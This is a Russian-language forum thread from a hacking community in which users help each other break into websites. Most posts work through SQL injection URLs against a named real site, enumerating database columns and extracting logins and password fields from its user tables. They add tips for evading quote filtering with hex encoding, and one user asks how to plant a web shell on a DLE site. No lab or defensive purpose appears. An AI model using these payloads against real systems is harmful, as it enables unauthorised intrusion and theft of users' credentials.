08.02.2009, 17:18
|
|
Новичок
Регистрация: 02.04.2007
Сообщений: 12
Провел на форуме:
105055
Репутация:
7
|
|
Спасибо) Будем попробовать.
|
|
|
08.02.2009, 18:44
|
|
Новичок
Регистрация: 05.11.2008
Сообщений: 11
Провел на форуме:
93930
Репутация:
0
|
|
Всем здасьте объясните каким способом можно залить шелл на сайт где установлен двиг DLE
|
|
|
|
08.02.2009, 20:58
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
Возможно ли в php-инъекции как-нибудь вывести содержимое директории, а не файла?
|
|
|
|
08.02.2009, 21:12
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
2 InFlame
неа
|
|
|
|
08.02.2009, 21:25
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Привет. Я опять же с этим сайтом. Здесь нашел что в табле юзерс есть поле логин.
Код:
http://psp-club.ru/files/get/-114+union+select+COLUMN_NAME,2,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='USERS'+limit+10,1--/
Но когда пытаюсь вывести
Код:
http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+users+limit+1,1/
Ничего не выводит. Жду помощи, и конечно спасибо выражу +5. |
|
|
|
08.02.2009, 21:29
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Там несколько таблиц users. (4+)
Код:
http://psp-club.ru/files/get/-114+union+select+passwd,2,3,4,5,6,7,8,9+FROM+exim.users/*
Код:
http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+fake_gaming.users/*
Последний раз редактировалось R1dex; 08.02.2009 в 21:32..
|
|
|
|
08.02.2009, 23:04
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от R1dex
Там несколько таблиц users. (4+)
Код:
http://psp-club.ru/files/get/-114+union+select+passwd,2,3,4,5,6,7,8,9+FROM+exim.users/*
Код:
http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+fake_gaming.users/*
А можно полный список баз и метод доставания всех баз? Лимит не катит...
|
|
|
|
08.02.2009, 23:32
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
mailbrush имя бд, где находиться нужная таблица можешь узнать так:
union+select+table_schema+from+information_schema. columns+where+table_name='users'
p.s. но лучше имя таблицы набирай в хэксе без кавычек, т.к. они могут фильтроваться, например table_name=0x7573657273
Последний раз редактировалось pinky07; 08.02.2009 в 23:40..
|
|
|
|
08.02.2009, 23:35
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от mailbrush
А можно полный список баз и метод доставания всех баз? Лимит не катит...
Отлично работает лимит. Прочти это:
https://forum.antichat.ru/thread104591.html
Или любой мануал по синтаксису
|
|
|
|
08.02.2009, 21:30
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Первый логин может быть пустой, либо в таблице вообше записей нет.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
